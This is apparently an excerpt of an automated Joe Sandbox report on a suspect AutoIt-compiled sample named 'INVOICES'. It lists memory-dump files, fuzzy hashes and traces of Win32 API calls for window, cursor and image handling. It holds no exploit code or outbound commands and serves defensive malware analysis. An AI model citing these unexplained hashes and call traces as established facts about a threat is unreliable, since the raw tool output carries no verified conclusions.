                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                                  • Opcode ID: 035a21a8fda42a4ebd3d358e1d3e3ca1fbfd88d9500b1e30739a98a1fc15cc97
                                                                                                                                  • Instruction ID: 97b61c8bbf53624b7c5e10e4b89f895dcacdf05d08c88ee827ad7b93940a55eb
                                                                                                                                  • Opcode Fuzzy Hash: 035a21a8fda42a4ebd3d358e1d3e3ca1fbfd88d9500b1e30739a98a1fc15cc97
                                                                                                                                  • Instruction Fuzzy Hash: 37E16A70900208EADF609F60CC88FFE7BBDEB05754F14815AF915AA291DB788A81CF61
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(?), ref: 007B4A33
                                                                                                                                  • GetDesktopWindow.USER32 ref: 007B4A48
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 007B4A4F
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007B4AB1
                                                                                                                                  • DestroyWindow.USER32(?), ref: 007B4ADD
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007B4B06
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007B4B24
                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007B4B4A
                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 007B4B5F
                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007B4B72
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 007B4B92
                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007B4BAD
                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007B4BC1
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 007B4BD9
                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 007B4BFF
                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 007B4C19
                                                                                                                                  • CopyRect.USER32(?,?), ref: 007B4C30
                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 007B4C9B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                  • Opcode ID: a10bf8735ce2b19aae6f8710d2f30c5a82a7c0d596a14d1d9df9020cf5d1c083
                                                                                                                                  • Instruction ID: f53442905b346b2ad717445d7982b55e2474a0cba96e0053f3c174a7b7135efa
                                                                                                                                  • Opcode Fuzzy Hash: a10bf8735ce2b19aae6f8710d2f30c5a82a7c0d596a14d1d9df9020cf5d1c083
                                                                                                                                  • Instruction Fuzzy Hash: D7B15B71604341AFDB04DF24C849BAABBE4FF88714F008A1DF5999B292D779EC04CB96
                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007328BC
                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 007328C4
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007328EF
                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 007328F7
                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0073291C
                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00732939
                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00732949
                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0073297C
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00732990
                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 007329AE
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 007329CA
                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 007329D5
                                                                                                                                    • Part of subcall function 00732344: GetCursorPos.USER32(?), ref: 00732357
                                                                                                                                    • Part of subcall function 00732344: ScreenToClient.USER32(007F57B0,?), ref: 00732374
                                                                                                                                    • Part of subcall function 00732344: GetAsyncKeyState.USER32(00000001), ref: 00732399
                                                                                                                                    • Part of subcall function 00732344: GetAsyncKeyState.USER32(00000002), ref: 007323A7
                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00731256), ref: 007329FC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                  • Opcode ID: b571b9d85dc20a9d88c9164d092c8f812f831946eb705707955f3c02649d6a3b
                                                                                                                                  • Instruction ID: 2b25865ca538eada179273725d5fb7b92e230a203f4a5034b05a8eba27e73baa
                                                                                                                                  • Opcode Fuzzy Hash: b571b9d85dc20a9d88c9164d092c8f812f831946eb705707955f3c02649d6a3b
                                                                                                                                  • Instruction Fuzzy Hash: ACB15F7160020AEFEB15DFA8DC59BED7BB4FB08710F108229FE15A7291DB78A851CB54
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat$A1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                  • API String ID: 3483108802-1459072770
                                                                                                                                  • Opcode ID: af7d66114ff3989bb238cf0cfa1d76beb5fa3cf20ec89f454c106abc430b7176
                                                                                                                                  • Instruction ID: cbb36953785479ce9d06da70fff8f9f481e31c1259669482da104ea6fbe6e1e6
                                                                                                                                  • Opcode Fuzzy Hash: af7d66114ff3989bb238cf0cfa1d76beb5fa3cf20ec89f454c106abc430b7176
                                                                                                                                  • Instruction Fuzzy Hash: 9A4127B2504204BBDB10AB64AC4BEFF376CDF46711F044066FC05E6183EBBC9A1696E9
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0078A885
                                                                                                                                  • __swprintf.LIBCMT ref: 0078A926
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078A939
                                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0078A98E
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078A9CA
                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0078AA01
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0078AA53
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0078AA89
                                                                                                                                  • GetParent.USER32(?), ref: 0078AAA7
                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 0078AAAE
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0078AB28
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078AB3C
                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0078AB62
• _wcscmp.LIBCMT ref: 0078AB76
  • Part of subcall function 007537AC: _iswctype.LIBCMT ref: 007537B4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
• Opcode ID: 730c6fb6031d62f081721f57b6509b2a9fb6ffed62ebb48df21d3640df823f17
• Instruction ID: 6f22e5a5dce7437587da3c39b9432673b05dd691ce5bcd6872ae5105cb7d8595
• Opcode Fuzzy Hash: 730c6fb6031d62f081721f57b6509b2a9fb6ffed62ebb48df21d3640df823f17
• Instruction Fuzzy Hash: 39A1C571244306FFE715EF64C888FAAB7A9FF04354F00862AF999C2150D738E955CB92
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0078B1DA
• _wcscmp.LIBCMT ref: 0078B1EB
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0078B213
• CharUpperBuffW.USER32(?,00000000), ref: 0078B230
• _wcscmp.LIBCMT ref: 0078B24E
• _wcsstr.LIBCMT ref: 0078B25F
• GetClassNameW.USER32(00000018,?,00000400), ref: 0078B297
• _wcscmp.LIBCMT ref: 0078B2A7
• GetWindowTextW.USER32(00000002,?,00000400), ref: 0078B2CE
• GetClassNameW.USER32(00000018,?,00000400), ref: 0078B317
• _wcscmp.LIBCMT ref: 0078B327
• GetClassNameW.USER32(00000010,?,00000400), ref: 0078B34F
• GetWindowRect.USER32(00000004,?), ref: 0078B3B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 005638243198aef8885a90bbaa1017158a180aa429e7728fffa02dd742ae8df1
• Instruction ID: 08e58bd93d984fa1515befdb86518c4a238530f6f9c905a37b6e8b24845b3066
• Opcode Fuzzy Hash: 005638243198aef8885a90bbaa1017158a180aa429e7728fffa02dd742ae8df1
• Instruction Fuzzy Hash: C181B27104834A9FDB04EF10C885FAA7BE8FF44714F048569FD898A0A2DB78DD4ACB61
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: f055ef7f1188ddde8efcc961e6307af8be69de731799168d2683f38b59181e8a
• Instruction ID: e0c7f04f22891044e0c93db96126e9acc1a58fed0bc8e087b9788d77291d2188
• Opcode Fuzzy Hash: f055ef7f1188ddde8efcc961e6307af8be69de731799168d2683f38b59181e8a
• Instruction Fuzzy Hash: C831B0B1A88309E6EA28FA65CC4BEEF77A49F14751F204128F451710E2EF6E6F04C751
APIs
• LoadIconW.USER32(00000063), ref: 0078C2D3
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0078C2E5
• SetWindowTextW.USER32(?,?), ref: 0078C2FC
• GetDlgItem.USER32(?,000003EA), ref: 0078C311
• SetWindowTextW.USER32(00000000,?), ref: 0078C317
• GetDlgItem.USER32(?,000003E9), ref: 0078C327
• SetWindowTextW.USER32(00000000,?), ref: 0078C32D
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0078C34E
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0078C368
• GetWindowRect.USER32(?,?), ref: 0078C371
• SetWindowTextW.USER32(?,?), ref: 0078C3DC
• GetDesktopWindow.USER32 ref: 0078C3E2
• GetWindowRect.USER32(00000000), ref: 0078C3E9
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0078C435
• GetClientRect.USER32(?,?), ref: 0078C442
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0078C467
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0078C492
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: 00e80476a5e5073b9037b2d454f48e1ab89f56956f111a4c1a20fce151968b44
• Instruction ID: 0de70548798378c1738525e6e49a5d492e4b4c378a08edee848d87cc3f267629
• Opcode Fuzzy Hash: 00e80476a5e5073b9037b2d454f48e1ab89f56956f111a4c1a20fce151968b44
• Instruction Fuzzy Hash: 63518130940709EFDB21EFA8DD89F6EBBF5FF04704F008629E646A25A0D778A945CB50
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 007A5129
• LoadCursorW.USER32(00000000,00007F00), ref: 007A5134
• LoadCursorW.USER32(00000000,00007F03), ref: 007A513F
• LoadCursorW.USER32(00000000,00007F8B), ref: 007A514A
• LoadCursorW.USER32(00000000,00007F01), ref: 007A5155
• LoadCursorW.USER32(00000000,00007F81), ref: 007A5160
• LoadCursorW.USER32(00000000,00007F88), ref: 007A516B
• LoadCursorW.USER32(00000000,00007F80), ref: 007A5176
• LoadCursorW.USER32(00000000,00007F86), ref: 007A5181
• LoadCursorW.USER32(00000000,00007F83), ref: 007A518C
• LoadCursorW.USER32(00000000,00007F85), ref: 007A5197
• LoadCursorW.USER32(00000000,00007F82), ref: 007A51A2
• LoadCursorW.USER32(00000000,00007F84), ref: 007A51AD
• LoadCursorW.USER32(00000000,00007F04), ref: 007A51B8
• LoadCursorW.USER32(00000000,00007F02), ref: 007A51C3
• LoadCursorW.USER32(00000000,00007F89), ref: 007A51CE
• GetCursorInfo.USER32(?), ref: 007A51DE
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 68a00c456e729a8100947c814717a8171558e3c87d2c94dba6b3ebdb13a4bdf9
• Instruction ID: ce9765b75f1fb7a1ede8da4af016cc8d22f2641d03f1c5f4cdef1dec94bdcaea
• Opcode Fuzzy Hash: 68a00c456e729a8100947c814717a8171558e3c87d2c94dba6b3ebdb13a4bdf9
• Instruction Fuzzy Hash: E33105B0D4831D6ADB209FB69C899AFBEE8FF44750F50452AE54DE7280DA7C6500CFA1
APIs
• _memset.LIBCMT ref: 007BA28B
• DestroyWindow.USER32(?,?), ref: 007BA305
  • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007BA37F
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007BA3A1
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007BA3B4
• DestroyWindow.USER32(00000000), ref: 007BA3D6
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00730000,00000000), ref: 007BA40D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007BA426
• GetDesktopWindow.USER32 ref: 007BA43F
• GetWindowRect.USER32(00000000), ref: 007BA446
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007BA45E
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007BA476
  • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Opcode ID: 6342e307a04b586fe6a49c11d55c69602370d58224776156dc65afdbece40432
• Instruction ID: d3404dbf35531385e7cdddaf54ab2ad8537f639d6f7bcf83740dcba5f5a1c37b
                                                                                                                                  • Opcode Fuzzy Hash: 6342e307a04b586fe6a49c11d55c69602370d58224776156dc65afdbece40432
                                                                                                                                  • Instruction Fuzzy Hash: 3471AE71150684AFD720DF28DC49FA67BE5FB88704F04862DF986872A1D779E902CF26
APIs
• CharUpperBuffW.USER32(?,?), ref: 007B448D
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007B44D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: 60bb3f2752b20b8c79f8c112fc85055576367760085bb4445853ac07088863d6
• Instruction ID: 7c5cc50904d091c770d18bb8f47c3bc80fa5e82f9e0978b66f9c9d3b001c4784
• Opcode Fuzzy Hash: 60bb3f2752b20b8c79f8c112fc85055576367760085bb4445853ac07088863d6
• Instruction Fuzzy Hash: 63919E74204701DFDB14EF24C895BA9B7A1AF89314F04856CF9965B3A3CB78ED0ACB91
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007BB8E8
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007B91F4), ref: 007BB944
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007BB97D
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007BB9C0
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007BB9F7
• FreeLibrary.KERNEL32(?), ref: 007BBA03
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007BBA13
• DestroyCursor.USER32(?), ref: 007BBA22
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007BBA3F
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007BBA4B
  • Part of subcall function 0075307D: __wcsicmp_l.LIBCMT ref: 00753106
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 3907162815-1154884017
• Opcode ID: 4d4d55f0a75fa9490ffdf768d8b8eaf581cfcb1a66e6aa268c7fdf4b7c1cc9c1
• Instruction ID: 2b21b751fc179af59bef593ed69cfa3345d716e2ced5f4c4925f1b7ed7f9c2a0
• Opcode Fuzzy Hash: 4d4d55f0a75fa9490ffdf768d8b8eaf581cfcb1a66e6aa268c7fdf4b7c1cc9c1
• Instruction Fuzzy Hash: 9E61BDB1A00619FAEB14DF64CC45FFE77A8EB08B11F108215FD15D61D1DBB8A985CBA0
APIs
  • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
  • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
• CharLowerBuffW.USER32(?,?), ref: 0079A455
• GetDriveTypeW.KERNEL32 ref: 0079A4A2
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0079A4EA
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0079A521
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0079A54F
  • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
